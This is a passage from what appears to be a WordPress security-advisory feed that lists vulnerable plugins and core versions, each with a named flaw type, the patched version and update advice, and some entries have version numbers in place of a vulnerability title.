Vulnerability: Reflected Cross-Site Scripting via ‘tax_name’
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Insecure Direct Object Reference via update_payment_intent_ajax
Patched Version: 7.6.2
Recommended Action: Update to version 7.6.2, or a newer patched version

Plugin: User Blocker

Vulnerability: Authenticated (Admin+) CSV Injection
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: ULTIMATE TABLES

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Correos Oficial

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.54
Recommended Action: Update to version 2.0.54, or a newer patched version

Plugin: 404s

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Kunze Law

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.7.31
Recommended Action: Update to version 1.7.31, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: Slider Factory – Responsive Photo Slider, Image Slider, Video Slider, Carousel Slideshow

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Author Box, Guest Author and Co-Authors for Your Posts – Molongui

Vulnerability: Missing Authorization
Patched Version: 4.7.4
Recommended Action: Update to version 4.7.4, or a newer patched version

Plugin: Naver Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Maintenance Switch

Vulnerability: Cross-Site Request Forgery via ‘admin_action_request’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Cross-Site Request Forgery via Several Functions
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Drop Shadow Boxes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.11
Recommended Action: Update to version 1.7.11, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.27.0
Recommended Action: Update to version 1.27.0, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery leading to Cross-Site Scripting
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: HashBar – WordPress Notification Bar

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: SQL Injection
Patched Version: 2.3.16
Recommended Action: Update to version 2.3.16, or a newer patched version

Plugin: Pretty Url

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 13.0.8
Recommended Action: Update to version 13.0.8, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms <= 3.7.9.4
Patched Version: 3.8.0.9
Recommended Action: Update to version 3.8.0.9, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting via SQL Injection
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Recipe Card Blocks for Gutenberg & Elementor – Best WordPress Recipe Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Cyklodev WP Notify

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Membership

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: RSVP and Event Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Simple Membership WP user Import

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Gettext override translations

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: FunnelKit Checkout

Vulnerability: Authenticated (Subscriber+) Missing Authorization to Arbitrary Plugin Activation
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 6.8.0
Recommended Action: Update to version 6.8.0, or a newer patched version

Plugin: WP Word Count

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: CHP Ads Block Detector

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: WP-Print

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.52
Recommended Action: Update to version 2.52, or a newer patched version

Plugin: RSVPMaker

Vulnerability: SQL Injection
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: Booked – Appointment Booking for WordPress

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_order
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.16.5
Recommended Action: Update to version 1.16.5, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Remote Code Execution
Patched Version: 0.9.2.9
Recommended Action: Update to version 0.9.2.9, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Unauthenticated Content Injection
Patched Version: 7.6.11
Recommended Action: Update to version 7.6.11, or a newer patched version

Plugin: Paytm Payment Gateway

Vulnerability: Authenticated (Editor+) SQL Injection via ‘post’
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: WP Links Page

Vulnerability: Cross-Site Request Forgery via wplf_ajax_update_screenshots
Patched Version: 4.9.5
Recommended Action: Update to version 4.9.5, or a newer patched version

Plugin: Geo Controller

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.5.3
Recommended Action: Update to version 8.5.3, or a newer patched version

Plugin: Solid Central – Site Management, Backups, Security, and Reporting

Vulnerability: Authentication Bypass
Patched Version: 2.0.18
Recommended Action: Update to version 2.0.18, or a newer patched version

Plugin: User Login History

Vulnerability: SQL Injection via OrderBy
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Legal Pages – Privacy Policy, Terms & Conditions, GDPR, CCPA, and Cookie Notice Generator

Vulnerability: Cross-Site Request Forgery via moveToTrash and fetch_and_insert_template_data
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: OOPSpam Anti-Spam

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.36
Recommended Action: Update to version 1.1.36, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.2.6
Recommended Action: Update to version 8.2.6, or a newer patched version

Plugin: Microblog Poster – Auto Publish on Social Media

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: File Upload Size Limit Bypass
Patched Version: 1.3.6.5
Recommended Action: Update to version 1.3.6.5, or a newer patched version

Plugin: Code Snippets Extended

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stop User Enumeration

Vulnerability: Unauthenticated Username Enumeration
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms <= 3.8.0.4
Patched Version: 3.8.0.9
Recommended Action: Update to version 3.8.0.9, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Missing Authorization via REST API Endpoints
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Coming Soon – Under Construction

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Church Admin

Vulnerability: Server-Side Request Forgery via church_admin_import_csv
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Zippy

Vulnerability: Missing Authorization via adminInit
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Cross-Site Scripting
Patched Version: 5.8.12
Recommended Action: Update to version 5.8.12, or a newer patched version

Plugin: Protect WP Admin

Vulnerability: Unauthenticated Information Disclosure to Protection Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Fontiran

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Payment Form for PayPal Pro

Vulnerability: SQL Injection
Patched Version: 1.1.65
Recommended Action: Update to version 1.1.65, or a newer patched version

Plugin: WP Best Quiz

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ever Compare – Products Compare Plugin for WooCommerce

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Permalinks Customizer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘wpmsGGSaveInformation’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Core: WordPress

Vulnerability: Security Misconfiguration with URL Hostnames
Patched Version: 3.7.26
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.26, 3.8.26, 3.9.24, 4.0.23, 4.1.23, 4.2.20, 4.3.16, 4.4.15, 4.5.14, 4.6.11, 4.7.10, 4.8.6, 4.9.5

Plugin: CSV Import Export

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Database Manager – WP Adminer

Vulnerability: Information Exposure
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Log Reset
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: Page Builder by SiteOrigin

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: 2.10.16
Recommended Action: Update to version 2.10.16, or a newer patched version

Plugin: FLASH PLAYER PLUGIN

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: No subtitle
Patched Version: 7.8.8
Recommended Action: Update to version 7.8.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Shortcode Brackets
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: wordpress publish post email notification

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.2.3
Recommended Action: Update to version 1.0.2.3, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via ‘adminhash’
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: SQL Injection
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Drag and Drop Multiple File Upload for WooCommerce

Vulnerability: Cross-Site Request Forgery in upload and delete_file
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.5.31
Recommended Action: Update to version 1.5.31, or a newer patched version

Plugin: Widgets for Google Reviews

Vulnerability: Cross-Site Request Forgery to Plugin Settings Reset
Patched Version: 10.9.1
Recommended Action: Update to version 10.9.1, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Unauthenticated Insecure Direct Object Reference to Sensitive Information Disclosure
Patched Version: 5.5.1
Recommended Action: Update to one of the following versions, or a newer patched version: 5.5.1, 5.6.3, 5.7.1, 5.8.2, 5.9.1, 6.0.1, 6.1.1, 6.2.1, 6.3.1, 6.4.4, 6.5.2, 6.6.1, 6.7.1, 6.8.1, 6.9.1, 7.0.3, 7.1.1, 7.2.1, 7.3.1, 7.4.1

Plugin: Editable Table Simple Fast FrontEnd From Sql tables

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Cron Dashboard

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: salesking

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: MkRapel Regiones y Ciudades de Chile para WC

Vulnerability: Cross-Site Request Forgery via multiple functions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Content Copy Protection & No Right Click

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Link2Player

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WC Fields Factory

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Child Theme Creator by Orbisius

Vulnerability: Arbitrary File Write
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Scroll To Top

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP-Lister Lite for eBay

Vulnerability: Reflected Cross-Site Scripting via ‘s’
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Woocommerce Products Designer by ORION – online product customizer for t-shirts, print cards, phone cases Lettering & Decals

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: 4.0.3
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: share-this

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.0.6
Recommended Action: Update to version 7.0.6, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 9.5.2
Recommended Action: Update to version 9.5.2, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Arbitrary Usermeta Update to Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.6.14
Recommended Action: Update to version 1.6.14, or a newer patched version

Plugin: NS Coupon To Become Customer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: sem-wysiwyg

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: mm-forms-community

Vulnerability: Arbitrary File Upload
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: PDF24 Articles To PDF

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: System Dashboard

Vulnerability: Missing Authorization to Information Disclosure (sd_global_value)
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Server-Side Request Forgery
Patched Version: 1.9.10.69
Recommended Action: Update to version 1.9.10.69, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Authenticated CSV Injection
Patched Version: 9.7
Recommended Action: Update to version 9.7, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Request Forgery to Arbitrary Member Deletion
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: Float to Top Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Soundy Background Music

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login with phone number

Vulnerability: Cross-Site Request Forgery to User Password Change
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: WP-Cirrus

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.0.77
Recommended Action: Update to version 1.0.77, or a newer patched version

Plugin: JTRT Responsive Tables

Vulnerability: SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.4.1
Recommended Action: Update to version 0.9.4.1, or a newer patched version

Plugin: Google Map Generator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Search by BestWebSoft – Advanced WordPress Search Bar Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.36
Recommended Action: Update to version 1.36, or a newer patched version

Plugin: CBX Currency Converter

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Leakage/Changes
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: CorreosExpress – Shipping Management – Tags

Vulnerability: Sensitive Data Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Indeed Job Importer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bulk Delete Users by Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smart External Link Click Monitor [Link Log]

Vulnerability: HTTP Response Splitting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: WP Edit Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 4.3.45
Recommended Action: Update to version 4.3.45, or a newer patched version

Plugin: Who Hit The Page – Hit Counter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WDContactFormBuilder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Enhanced WP Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Donation Plugin and Fundraising Platform <= 2.5.0
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Email Forgery
Patched Version: 4.5.6
Recommended Action: Update to version 4.5.6, or a newer patched version

Plugin: fbgorilla

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Organizer

Vulnerability: Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Missing Authorization on ‘load_recaptcha_preview’ AJAX function
Patched Version: 1.23.3
Recommended Action: Update to version 1.23.3, or a newer patched version

Plugin: Alkubot – Gamify discounts, sell more and give less at the right time

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Post/Page Deletion
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Insert Html Snippet

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Core: WordPress

Vulnerability: IP Address Spoofing
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Kioskprox

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accessibility Suite by Ability, Inc

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.12
Recommended Action: Update to version 4.12, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘instantEditRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Unspecified Vulnerability
Patched Version: 2.0.23
Recommended Action: Update to version 2.0.23, or a newer patched version

Plugin: Event List

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 0.7.9
Recommended Action: Update to version 0.7.9, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Add Subtitle

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Donations

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Elementor

Vulnerability: Registration Bypass
Patched Version: 1.24.2
Recommended Action: Update to version 1.24.2, or a newer patched version

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.5.7.7
Recommended Action: Update to version 1.5.7.7, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

